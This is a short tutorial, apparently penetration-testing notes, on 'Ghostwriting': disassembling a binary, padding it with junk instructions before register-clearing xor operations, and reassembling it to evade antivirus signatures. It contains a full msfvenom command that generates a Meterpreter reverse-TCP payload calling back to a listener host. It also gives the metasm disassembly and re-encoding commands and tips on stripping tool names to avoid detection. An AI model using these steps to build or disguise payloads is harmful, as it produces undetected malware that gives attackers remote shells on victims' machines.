- Changing the assembly source code of a binary to alter the well-known signature used by anti-virus engines.
- Overview:
  - Create a .exe
  - Convert it to .asm
  - Edit the .asm file
  - Convert back to .exe
- Most of the time you don't want to alter the functionality of the binary.
- Some additional things (outside of Ghostwriting) that can help with evading signatures are:
  - Removing the Help menu of a tool
  - Removing instances of the tool name in the source code
- Generate a `msfvenom` payload, for example:
  msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.12 LPORT=4444 -f raw -o payload.raw --platform windows -a x86
  ruby /opt/metasm/samples/disassemble.rb payload.raw > payload.asm
- Now open the file in `gedit`.
- At the very top of the file add:
  .section '.text' rwx
  .entrypoint
- Now start by finding any instance of `xor` where a register is xor'ed against itself.
- When a register is xor'ed against itself, it clears the register to a value of 0.
- For example, look for something like this:
  xor eax, eax
- Because the normal code execution will clear out any value in `eax`, we can add additional instructions before the xor.
- Thus we can add this in before the `xor` statement:
  push eax
  pop eax
  xor eax, eax
- Also feel free to add other irrelevant instructions before an `xor` occurs. Remember, only where an operand is xor'ed with itself.
- You can also add `nop` instructions into the program at the correct places.
- Testing is your best friend here.
- Once you are done altering the asm, it is time to convert it back to an exe:
  ruby /opt/metasm/samples/peencode.rb payload.asm -o payload.exe